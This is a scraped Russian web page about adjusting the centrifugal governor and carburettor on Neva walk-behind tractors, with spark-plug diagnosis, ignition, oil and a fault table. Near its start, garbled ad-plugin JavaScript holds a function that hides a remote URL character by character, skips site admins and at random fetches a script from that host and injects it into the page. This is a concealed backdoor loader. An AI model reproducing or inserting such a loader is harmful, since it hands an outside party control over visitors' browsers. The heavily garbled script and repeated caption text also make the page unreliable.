Регулировка центробежного регулятора на мотоблоке — Сад и Огород — Про мотоблоки

Регулировка центробежного регулятора на мотоблоке - Сад и Огород - Про мотоблоки Мотоблоки

Как отрегулировать центробежный регулятор на мотоблоке

«:’

‘:»»,document.createElement(«div»),p=ff(window),b=ff(«body»),m=void 0===flatPM_getCookie(«flat_modal_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_modal_» o.ID «_mb»),i=»scroll.flatmodal» o.ID,g=»mouseleave.flatmodal» o.ID » blur.flatmodal» o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&»true»==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie&&m&&(flatPM_setCookie(«flat_modal_» o.ID «_mb»,!1),ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l()),void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l())},ff(«body > *»).eq(0).before(‘

‘ c «

«),w=document.querySelector(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_modal-content’),-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n(),b.on(«click»,’.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_cross’,function(){flatPM_setCookie(«flat_out_» o.ID «_mb»,!1)})),void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n())}var _,u=»0″!=o.how.outgoing.indent?’ style=»bottom:’ o.how.outgoing.indent ‘px»‘:»»,c=»true»==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count «

«:’

‘:»»,p=ff(window),h=»scroll.out» o.ID,g=»mouseleave.outgoing» o.ID » blur.outgoing» o.ID,m=void 0===flatPM_getCookie(«flat_out_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_out_» o.ID «_mb»),b=(document.createElement(«div»),ff(«body»));switch(o.how.outgoing.whence){case»1″:_=»top»;break;case»2″:_=»bottom»;break;case»3″:_=»left»;break;case»4″:_=»right»}ff(«body > *»).eq(0).before(‘

‘ c «

«);var v,w=document.querySelector(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’);-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=»‘ o.ID ‘»]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(«body»),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)»);0<_.length&&_.each(function(){var t=ff(this),e=t.data(«height»)||350,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(«.flatPM_sidebar»);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(«.flatPM_sticky_wrapper.flatPM_sidebar_block»).css(«height»,t)},4e3)}),»undefined»!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(«body> *»).last().after(‘

‘),flat_body.on(«click»,».flat__4_out .flat__4_cross»,function(){ff(this).parent().removeClass(«show»).addClass(«closed»)}),flat_body.on(«click»,».flat__4_modal .flat__4_cross»,function(){ff(this).closest(«.flat__4_modal»).removeClass(«flat__4_modal-show»)}),flat_pm_arr=[],ff(«.flat_pm_start»).remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie(«flat_r_mb»,»zen.yandex»),flat_userVars.referer=»zen.yandex»);var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,»

«],thead:[1,»

«],tbody:[1,»

«],colgroup:[2,»

«],col:[3,»

«],tr:[2,»

«],td:[3,»

«],th:[3,»

«],_default:[0,»»,»»]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement(«div»)),r=(d.exec(e)||[«»,»»])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(o,»<$1>») r[2],l=r[0];l—;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,200);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «m» «e» «h» «a» «n» «o» «i» «d» «.» «p» «r» «o» «/» «p» «i» «ng» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,r=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,l=’

‘,i=e.once;n(t).each(function(){var e=n(this);e.wrap(‘

‘);var t=e.closest(«.flat__4_video»);-1!==l.indexOf(«go» «oglesyndication»)?t.append(l):flatPM_setHTML(t[0],l),e.find(«.flat__4_video_flex»).one(«click»,function(){n(this).addClass(«show»)})}),n(«body»).on(«click»,».flat__4_video_item_hover»,function(){var e=n(this),t=e.closest(«.flat__4_video_flex»);t.addClass(«show»);var a=t.find(«.flat__4_timer span»),r=parseInt(o),l=setInterval(function(){a.text(—r),r<=0&&(clearInterval(l),»true»==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(«click»,».flat__4_video_flex .flat__4_cross»,function(){n(this).closest(«.flat__4_video_flex»).remove(),»true»==i&&n(«.flat__4_video_flex»).remove()})}

Регулировка холостого хода у мотоблока

Настройка карбюратора мотоблока заключается в его регулировке. Для возможности без помощи других отрегулировать карбюратор, необходимо сделать последующие шаги:

  1. Винты малого и полного газа необходимо закрутить по полной программе.
  2. Винты малого и полного газа выкрутить на полтора оборота (устанавливаем дроссельную заслонку в такое положение, чтоб меж основанием и воздуховодом образовалась щель соответственного размера).
  3. Завести мотор и подождать, пока он прогреется.
  4. При работающем моторе рычаг управления поставить на малые обороты.
  5. Достигнуть бесперебойной работы мотора. Для этой цели необходимо сделать наименьшими обороты холостого хода, используя винт дроссельной заслонки.
  6. Поставить обороты холостого хода на максимум с помощью винта малого газа.
  7. Поставить обороты холостого хода на как в кинотеатре с помощью винта дроссельной заслонки.
  8. Повторять 6 и 7 шаг пока не начнется непрерывная работа мотора.
  9. Рычаг управления мотором поставить на газ.
  10. При появлении перебоя отвернуть винтом, регулирующим качество консистенции, менее 2.4,5 оборотов.

Хотелось бы отметить, что регулировка карбюратора на мотоблоке Нева совершается верно по вышеуказанной аннотации. Установленный на мотоблоке Нева устройство К-45 является однокамерным и горизонтальным. Камера поплавка находится в самом центре. Дроссельная заслонка — плоская.

На мотоблоке Нева употребляется движок ДМ-1К, который выпускается на заводе «Красный Октябрь Нева». Производитель категорически не употребляет движки китайского производства. Это касается и производства мотокультиватора.

Бензин, который поступает в данное устройство, не обязательно содержит механические примеси. Нашему клиенту остается детали обрабатываются только бензином. Не допускается применение растворителя, потому что повреждается упругость шайбы и резиновых частей.

Для просушки деталей используйте продувку сжатым воздухом. Очищать маленькие отверстия проволокой по другому иглой не рекомендуется. Установка после ремонта либо чистки должна выполняться умеренно, чтоб не вышло извивов и деформации деталей.

Постараюсь в статье обобщить и разместить в одном месте информацию с различных источников. Прошу прощения у авторов статей, что не указываю ссылок на них. Просто уже не помню, откуда брал информацию. Ещё не претендую на 100% достоверность всей информации, т.к. некоторые выводы делаю по собственным догадкам.

Возможно, кто-то меня поправит. Давайте практики, вместе создадим небольшую инструкцию по наладке. Специалисты сервисных центров, конечно, всё знают, но не поделятся своими знаниями. Чем меньше информации, тем им выгоднее. Ведь Нева уже давно выпускается, а литературы по ремонту и наладке нет. И не будет.

Как и в моём случае, Вам, ответят: «Привозите к нам»! А если это другое государство, или тысячи километров до сервисной мастерской, тогда как. Я такой не один. Читаю в разных форумах, народ интересуется, как это работает и как наладить. Поэтому попробую из самого простого. Для кого-то это будет ясно и так, а новичкам, может, станет понятней.

Просто столкнулся с проблемой по настройке мотоблока Нева МБ-2. Во время эксплуатации, протирал тряпкой тягу центробежного регулятора и видать не сильно был затянут болт, — в общем она провернулась. После этого долго пытался наладить, пока не получилось. Попытаюсь описать, как я регулировали, как это работает.

Начну с центробежного регулятора. Его назначение поддерживать постоянную частоту вращения коленчатого вала двигателя при изменении нагрузки на вал. Т.е. для того чтобы мотоблок не заглох, когда Вы к примеру пашете. При этом через колёса, редуктор, шкив, ремень, шкив двигателя начинает притормаживать двигатель и если бы не центробежный регулятор, то двигатель заглох. Ведь у нас нет возможности как у машины давить всё больше на газ. Конструкция продумана очень грамотно.

Кликнете на картинке для увеличения

После того как двигатель завели, раскручиваются грузики регулятора. Они за счёт центробежной силы разъезжаются, раскрываясь как цветок, и на штоке смещается вперёд, поворачивая рычаг регулятора. Теперь, если мы будем нагружать двигатель, при этом вращение двигателя начнёт замедляться.

При этом скорость вращения грузиков снизится также, они начнут складываться (прикрываться как цветок) и рычаг регулятора начнёт возвращаться назад, что приведёт к повороту через рычаг центробежного регулятора, тягу, дроссельную заслонку карбюратора на увеличение расхода топлива, т.е. добавит газу. Т.е . выставив ручку газа в определённое положение, мы можем теперь не беспокоится, что двигатель при нагрузке заглохнет.

Как только мы уменьшаем нагрузку, грузики опять расходятся и поворачивают через все тяги дроссельную заслонку теперь на уменьшение газа. В этой всей линейке есть ещё одна пружина. При увеличении газа она через трос и скобу в форме буквы «Г» растягивается и противодействует поворачиванию дроссельной задвижки в сторону уменьшения газа.

Кликнете на картинке для увеличения

Дальше. Т.к. обороты «гуляют» при открытии полностью воздушной заслонки, то выходит бедная смесь. Необходимо её отрегулировать. Вкручиваем до упора винт корректировки рабочей смеси холостого хода. Теперь выкручиваем на полтора оборота этот винт и заводим двигатель.

Устройство карбюратора таково, что при вкручивании винта мы перекрываем воздушный канал и увеличиваем количество бензина в двигатель. Т. е. обогащаем смесь, а если выкручиваем винт, то добавляем больше воздуха, поэтому обедняем смесь. Теперь при полностью открытой воздушной заслонке пытаемся вращением винта добиться максимально устойчивых оборотов, снижаем газ до минимума и опять пытаемся добиться минимально низких, но устойчивых оборотов двигателя.

Теперь смотрим еще одну немаловажную часть — винт упора дроссельной заслонки. При выведенном газе, он должен упираться в плату карбюратора. Теперь плавно выкручиваем его и добиваемся минимальных оборотов. Этот винт даёт закрыться дроссельной заслонке на определённый угол.

Определение проблем в работе двигателя по внешнему виду свечей зажигания.

Надеемся, что данная статья поможет Вам правильно подобрать свечу зажигания и определить состояние вашего двигателя. По внешнему виду электрода свечи зажигания можно определить состояние двигателя, пригодность калильного числа свечи зажигания, а также действительно ли карбюратор и угол опережения зажигания отрегулированы должным образом.

  • Мокрые электроды свечи зажигания (рис. 1-2) могут быть следствием одной из следующих причин:

(а) Очень богатая воздушно-топливная смесь (много топлива, мало воздуха). (б) Неисправность системы зажигания. (в) Попадание масла в камеру сгорания (изношенные: поршневые кольца или направляющие втулки клапана).

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

  • Электроды свечи зажигания, покрытые сажей (рис. 3, 4 и 5) могут быть следствием одной из следующих причин:

(а) Используется свеча со слишком высоким калильным числом, поэтому электроды работают в состоянии неполной нагрузки и не могут выйти на самоочищающийся температурный режим (выше 400-450°С).
(б) Использование слишком богатой топливно-воздушной смеси (больше, чем 8:1-10:1).
(в) Неисправность системы зажигания.
(г) Неисправность системы охлаждения (слишком сильное охлаждение).

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Слишком холодная свеча

Слишком холодная свеча

  • Даже свечи, у которых хороший внешний вид (рис. 6-24), весьма часто могут быть покрыты свинцовым налётом из-за перебоев зажигания.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Холодная свеча или
богатая смесь
Но хорошо

Холодная свеча или
богатая смесь
Но хорошо

Холодная свеча или
богатая смесь
Но хорошо

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Немного горячая
Но хорошо

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Горячая свеча или
бедная смесь
Но хорошо

Горячая свеча или
бедная смесь
Но хорошо

Горячая свеча или
бедная смесь
Но хорошо

(а) Используется свеча со слишком низким калильным числом, поэтому электроды работают в состоянии чрезмерно большой
нагрузки и превышают верхний предел оптимального температурного режима (выше 850-1000°С).
(б) Бедная воздушно-топливная смесь.
(в) Установлен поздний угол опережения зажигания.
(г) Анормальное сгорание воздушно-топливной смеси (детонация).
(д) Неисправность системы охлаждения (перегрев двигателя).

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Слишком горячая свеча или
бедная смесь
Раннее зажигание

Слишком горячая свеча или
бедная смесь
Раннее зажигание

Слишком горячая свеча или
бедная смесь
Раннее зажигание

  • Перегретые и оплавленные электроды свечи зажигания (рис. 28 и 29), как правило, являются следствием интенсивной детонации и раннего зажигания.
Регулировка центробежного регулятора на мотоблоке - Сад и ОгородРегулировка центробежного регулятора на мотоблоке - Сад и Огород
Регулировка центробежного регулятора на мотоблоке - Сад и ОгородРегулировка центробежного регулятора на мотоблоке - Сад и ОгородРегулировка центробежного регулятора на мотоблоке - Сад и ОгородРегулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке — про стройку и не только

24 Апр by admin

При отсутствии подачи топлива в цилиндр (сухая свеча) проверьте наличие достаточного количества топлива в топливном баке, поступление топлива из топливного бака к карбюратору, сняв топливный шланг со входного штуцера карбюратора (или, для карбюратора К45, нажав на его утолитель до подтекания топлива через дренажное отверстие).

При не поступлении топлива к карбюратору выверните топливный кран, разберите его, очистите фильтрующий элемент от грязи, детали промойте в бензине. Соберите топливный кран, продуйте и установите на место.

При поступлении топлива в карбюратор (и отсутствии его подачи в цилиндр) проверьте работу топливного клапана и чистоту жиклеров карбюратора.

Для проверки карбюратора КМБ-5 снимите карбюратор с двигателя, слейте бензин из поплавковой камеры. Подайте воздух через штуцер подвода топлива (рис. 25) в рабочем положении карбюратора. Воздух должен свободно продуваться. Повторите операцию с перевернутым на 180° карбюратором. Прохождение воздуха через штуцер должно прекратиться. При выполнении этих условий топливный клапан исправен.

Уровень топлива в поплавковой камере регулируйте отгибанием или подгибанием регулировочного язычка поплавка. Нормальным считается уровень топлива (30…35) мм.

Рис. 25. Карбюратор КМБ-5: 1 — штуцер подвода топлива; 2 — корпус верхний; 3 — заслонка дроссельная; 4 — игла малого газа; 5 — воздушный жиклер; 6 — корпус нижний; 7 — заслонка воздушная; S — винт крепления стяжки; 9 — игла полного газа; 10 — распылитель; 11 — поплавок; 12 — топливный клапан.

       Для продувки жиклеров выверните винты регулировки малого и полного газа.

       Для промывки элементов карбюратора отверните винты верхнего корпуса, снимите нижний корпус, промойте бензином топливный клапан, прочистите и с помощью насоса продуйте жиклеры, проверьте целостность поплавка. Протирка деталей карбюратора ветошью не допускается.

       После промывки и продувки пристыкуйте нижний корпус карбюратора к верхнему, обращая внимание па трубку распылителя, которая должна войти в отверстие верхнего корпуса. Откройге дроссельную заслонку и проверьте правильность сборки, после чего заверните винты крепления верхнего корпуса.

       Установленный после разборки карбюратор требует регулировки.

       Регулировку карбюратора выполняйте на прогретом двигателе в следующей последовательности.

       Вверните до упора (без большого усилия) винты регулировки малого и полного газа (рис. 25), затем выверните их на 1,5 оборота Запустите двигатель, прогрейте в течение 10 минут. Установите рычаг управления двигателем в положение минимальных устойчивых оборотов, не допуская остановки работы двигателя. Винтом упора дроссельной заслонки установите минимальные обороты холостого хода, при которых двигатель работает устойчиво, без перебоев.

       Регулировкой положения винта малого газа установите максимальные обороты холостого хода, после чего винтом упора дроссельной заслонки откорректируйте минимальные устойчивые обороты холостого хода.

       Повторите две последние операции для достижения устойчивой, бесперебойной работы двигателя на холостом ходу с минимально возможными оборотами.

       Переведите рычаг управления двигателем в положение ГАЗ. При появлении перебоев в работе двигателя отверните винт полного газа до получения устойчивой работы, но не более чем на 2,5 оборота.

Двигатель ДМ-1-01. устанавливаемый на мотоблоках МБ-1Д. отличается тем, что в нем использован карбюратор модели ДМ 1.08.100 мембранного типа. Внешний.вид карбюратора ДИ1.08.100 приведен на рис. 22.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 22. Внешний вид карбюратора ДМ1.08.100: 1 — винт полного газа; 2 — винт малого газа; 3 — рычаг воздушной заслонки; 4 — винт минимальных оборотов; 5 — фланец; 6 — дозирующее устройство; 7 — патрубок; 8 — прилив: 9 — шпилька; 10 — гайка; 11 — входной штуцер; 12 — кнопка.

…………………………………………………………………………………………………………

Система зажигания обеспечивает своевременное искрообразова-ние для воспламенения топливно-воздушной смеси в камере сгорания двигателя

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

В мотоблоках МБ-1 и в мотоблоках МБ-2 выпуска до 01.04.96 г. установлена система зажигания с электронным магдино ЭМ-1, устройство и электрическая схема которого представлены на рис. 17, а и 17,б.

       Рис. 17. Система зажигания с электронным магдино ЭМ-1 а — устройство; б — схема: 1 — преобразователь ПМК-1; 2 — экран зажигания; 3 — статор СМК-1; 4 — сопротивление подавительное; 5 — свеча зажигания; б — шайба; 7 — болт; 8 — шайба пружинная; 9 — втулка; 10 — кнопка стоп; 11 — магнитный башмак маховика.

       При вращении коленвала с закрепленным на нем маховиком магнитный башмак 11 маховика периодически проходит под магнитным сердечником статора 2, создавая в нем магнитное поле, наводящее ЭДС в обмотке статора 3. Напряжение от статора через высоковольтный провод и помехоподавительное сопротивление 4 подводится к свече 5, между электродами которой возникает электрическая искра.

  С 01.04.96 г. в мотоблоках МБ-2 «Нева» устанавливается схема зажигания двигателя с электронным магдино ЭМ-2, схема которого приведена на рис. 18. Отличительной особенностью этой схемы по сравнению с предыдущей является то, что статор и преобразователь конструктивно объединены в один узел с потенциально бол
ее высокой надежностью за счет исключения внешних соединительных проводов между статором и преобразователем.
Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Пусковое устройство служит для запуска двигателя мотоблока. Основные входящие в него узлы и детали приведены на рис. 19 и 20.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 19. Храповой механизм пускового устройства: 1 — маховик; 2 — шайба; 3 — корпус муфты; 4 — кольцо; 5 — шарик 10-100; 6 — храповик; 7 — крышка; 5 — кожух защитный; Р — шайба; 10 — шайба пружинная; 11 — винт М4х14.Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 20. Стартер: 1 — скоба; 2 — ручка; 3 — шнур; 4 — барабан стартера; 5 — пружина стартера; 6 — втулка опорная; 7 — пр
ужина; 8 — корпус вентилятора; 9 — винт М6х12; 10 — шайба пружинная: 11 — шайба; 12 — шайба пружинная; 13 — болт М6х16. 

Система охлаждения двигателя — воздушная, принудительная. Функцию вентилятора выполняет маховик 1 (рис. 19), снабженный крыльчаткой.

       Забор воздуха осуществляется через корпус 7 (рис. 20) вентилятора.

       Далее воздушный поток расщепляется между оребренными для лучшего охлаждения поверхностями блока цилиндра и экраном б головки цилиндра (рис. 8), а также экранами, показанными на рис. 21  Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Экраны системы охлаждения: 1 — отражатель; 2 — экран; 3 — шайба пружинная; 4 — винт М6х10.

Применение рекомендованного изготовителями мотоблоков масласпособствует сведению к минимуму возникновения неполадок в процессе эксплуатации двигателя. Каждый пользователь мотоблока должен помнить, что масло обеспечивает защиту двигателя во время работы четырьмя способами:

       1. СМАЗКА — смазывание работающих при минимальных зазорах подвижных деталей с целью уменьшения трения между ними и износа.

       2. ОХЛАЖДЕНИЕ — выполнение роли охлаждающей жидкости с целью обеспечения работы поршней, шатунов, и подшипников в условиях безопасных рабочих температур.

       3. УПЛОТНЕНИЕ — обеспечение уплотнения между стенками цилиндра и поршнем для достижения номинальной компрессии и предотвращения прорыва отработавших газов в картер двигателя.

       4. ОЧИСТКА — выполнение роли очищающего агента путем удержания во взвешенном состоянии побочных продуктов сгорания, таких, как сажа и жидкие осадки, образующиеся в результате окисления масла и топлива. При сливе масла они удаляются из двигателя.

       Высокая температура, при которой работают двигатели с воздушным охлаждением, вызывает окисление масла, пригорание смазки, оставшейся на горячей поверхности цилиндра, что сопровождается повышением дымности выхлопа и образованием нагара. В результате окисления масла в двигателе образуются смолистые отложения, которые являются основной причиной закоксовывания поршневых колец и неплотного прилегания впускных клапанов. Это ведет также к образованию шлама, затрудняющего нормальную смазку двигателя.

       Поэтому целесообразно использовать масла вместе с моющими и противо окислительными присадками, которые способствуют очищению двигателя от загрязнений и предотвращают образование смол и лакоподобных отложений. При использовании высококачественных импортных моторных масел (классифицируемых как «Моторные масла SF,SG»), например фирмы Briggs & Stratton SAE 30, специальных присадок вводить не требуется: они уже содержат необходимые присадки.

       Важен также правильный выбор сорта масла по классификации SAE в зависимости от температуры окружающей среды. Не рекомендуется использование в двигателях всесезонных масел типа 10W30 в летнее время при температуре окружающего, воздуха выше 5 C, так как это может привести к повышенному расходу масла и повреждениям двигателя. При использовании таких масел необходимо чаще проверять их уровень в двигателе. С другой стороны, использование летних масел (SAE 30) при температуре воздуха ниже 5°С приведет к затруднению запуска двигатели и может вызвать повреждение зеркала цилиндра из-за недостаточной смазки.

       Бензин, как и масло, в процессе хранения подвержен окислению, которое сопровождается отложением бензиновых смол в карбюраторе. Это может привести к неполадкам в работе двигателя, среди которых наиболее частыми являются засорение каналов подачи топлива и неплотное прилегание впускного канала.

Возможные неисправности, их причины и методы устранения приведены в таблице.

1. Двигатель не запускается, свеча сухая Нет подачи топлива: а) нет топлива в баке;

а) заправить бак;

  б) закрыт топливный кран;б) открыть кран

  в) засорено отверстие в пробке бензобака;в) прочистить дренажное отверстие в пробке топливного бака;

  г) засорение системы подачи топливаг) снять топливный кран, слить топливо из бака, пробыть бак чистым бензином, снять соединительный шланг со стороны карбюратора, продуть шланг и жиклеры карбюратора насосом без разборки карбюратора

2. Двигатель не запускается, свеча влажная1. Отказ в системе зажигания:

а) наличие нагара или масла на электродах свечи;а) очистить электроды свечи, промыть бензином, просушить;

  б) зазор между электродами свечи не соответствует техническим требованиям;

б) отрегулировать зазор подгибанием бокового электрода;

  в) повреждение изолятора свечи зажигания или высоковольтного провода;

в) заменить свечу или высоковольтный провод;

  г) замыкание кнопки СТОП на массу;г) устранить замыкание;

  д) нарушение контакта в угольнике свечи;д) проверить контакт в угольнике свечи;

  е)нарушен зазор между стартером и магнитным башмаком

;е) отрегулировать зазор в соответствии с п. «Проверка и регулировка системы зажигания»;

  ж) дефект статора

ж) заменить статор ..

  2. Подсос воздуха через уплотнения соединений:

— в карбюраторе,

— в карбюраторе-цилиндра,

— головки и цилиндра,

— свечи

Подтянуть болты крепления указанных соединений, проверить целостность прокладки между головкой и блоком цилиндра, затянуть свечу

  3. Недостаточное закрытие воздушной заслонки карбюратораПроверить действие и исправность привода, устранить заедание

3. Обратная отдача двигателя при запускеНарушение угла опережения зажигания вследствие: а) разрушения шпонки маховика;а) проверить состояние шпонки маховика, при необходимости заменить:

  б) неправильного сопряжения зубчатых колес коленчатого и распределительного валов при сборке

б) выполнить сопряжение валов в соответствии с требованиями

4. Запуск двигателя затруднен, двигатель работает неустойчиво и не развивает достаточной мощности

Потеря компрессии: а) нагар на рабочих поверхностях клапанов и/или седел блока цилиндра; деформация впускного клапана;

а) проверить состояние рабочих поверхностей деталей в соответствии с п. «Проверка технического состояния механизма газораспределения», дефектные детали заменить;

  б) износ поршневых колец

б) проверить степень износа поршневых колец в соответствии с п, «Проверка технического состояния кривошипно-шатунного механизма», дефектные детали заменить

5. При работе двигателя из глушителя выходит черный дым. замасливание электродов свечи, на свече нагар черного цвета) богатая смесь;

б)   не герметичен топливный клапан карбюратора; а) и б) проверить и отрегулировать карбюратор в соответствии с п. «Проверка и регулировка системы питания топливом»;

Характер неисправности Возможная причина Метод устранения

  в) износ маслосъемного кольца поршня;

г) засорен воздушный фильт

р),  заменить поршневые кольца;

г) прочистить или заменить воздушный фильтр

6. При работе двигателя из глушителя выходит дым светлого цвета, электроды свечи сухие с белым налетом Бедная смесь. Отрегулировать карбюратор.

7. В процессе работы двигатель начинает набирать обороты без поворота рычага ГАЗ управления двигателем (двигатель идет «вразнос»)Ослабло крепление рычага регулятора с рычагом тяги регулятора Выполнить регулировку привода управления двигателем в соответствии с п. «Проверка и регулировка системы питания топливом»

8. В процессе работы при полностью открытой дроссельной заслонке двигатель начинает снижать обороты и останавливается Перегрев двигателя Заглушить двигатель, не запускать его до полного охлаждения, проверить уровень масла в картере, чистоту оре-бренных поверхностей блока и головки цилиндра

9. Заклинивание двигателя Недостаток масла в картере двигателя, надир на нижней головки шатуна, разрушение шатуна и маслораз-брызгивателя Разобрать двигатель, проверить детали в соответствии с п. «Проверка технического состояния кривошипно-шатунного механизма»

10. При запуске нет вращения коленчатого вала Разрушение корпуса храповой муфты или храповика Разобрать пусковое устройство, заменить дефектные детали в соответствии с п. «Fe-монт пускового устройства»

11. Нет возврата шнура запуска Ослабла затяжка винтов крепления корпуса стартера к двигателю Отрегулировать положение стартера (покачиванием от руки), обеспечив возврат шнура, подтянуть винты крепления стартера

  Обрыв пружины стартера Заменить (отремонтировать) пружину стартера в соответствии с п. «Ремонт пускового устройства»

Клиноременная передачау мотоблоков типов МБ-1 и МБ-2 выполняет функцию трансмиссии и механизма сцепления и обеспечивает:

       — передачу крутящего момента от коленчатого вала двигателя к входному валу редуктора;

       — отключение двигателя от редуктора во время переключения передач и плавного соединения их вновь, исключающего резкие перепады нагрузки на двигатель;

       — плавное трогание мотоблока с места и его остановку без остановки работы двигателя,

       Клиноременные передачи мотоблоков МБ-2 (рис. 28) и МБ-1 (рис. 29) конструктивно отличаются, что вызвано применением в них редукторов различного типа

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

